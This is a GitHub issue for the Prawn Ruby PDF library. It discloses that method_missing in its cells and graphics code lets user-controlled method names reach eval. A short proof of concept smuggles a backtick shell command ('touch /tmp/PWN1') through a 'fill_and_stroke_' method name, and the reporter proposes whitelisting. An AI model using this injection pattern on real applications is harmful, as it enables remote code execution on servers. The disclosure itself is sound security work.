method_missing for cells and graphics enables code execution under certain prerequisites #382

Closed
felixgr opened this Issue Aug 9, 2012 · 1 comment

Projects

None yet

3 participants

@felixgr
felixgr commented Aug 9, 2012

In cells.rb and graphics.rb you define method_missing.

If an API user of prawn would derive a method name from end user supplied input, this can lead to attacker controlled code execution. As a practical example, think of a web application which draws circle, lines, etc on the PDF. The API user takes the entity from the HTTP request and uses it in a subsequent fill_and_stroke_ call.

Please refer to the example below which creates a file /tmp/PWN1.

require 'prawn'

Prawn::Document.generate "out.pdf" do |pdf|

# sample 1
user_supplied_entity = "line"
user_supplied_arg = [0, 200], [100, 150]

# prawn developer code
meth = "fill_and_stroke_#{user_supplied_entity}"
meth_s = meth.to_sym

pdf.send(meth_s, user_supplied_arg)

# sample 2 (attack)
user_supplied_entity = "eval"
user_supplied_arg = "`touch /tmp/PWN1`"

# prawn developer code
meth = "fill_and_stroke_#{user_supplied_entity}"
meth_s = meth.to_sym

pdf.send(meth_s, user_supplied_arg)
end

I would suggest to whitelist the allowed methods to be called with send(). This check could be done in the method_missing methods of cells and graphics.

Member

See #381, which has some performance improvements that involve re-architecting this method_missing code path. We'll revisit this issue once that refactoring is complete -- I've noted your concerns on #381.

@practicingruby practicingruby removed the stale label Mar 17, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment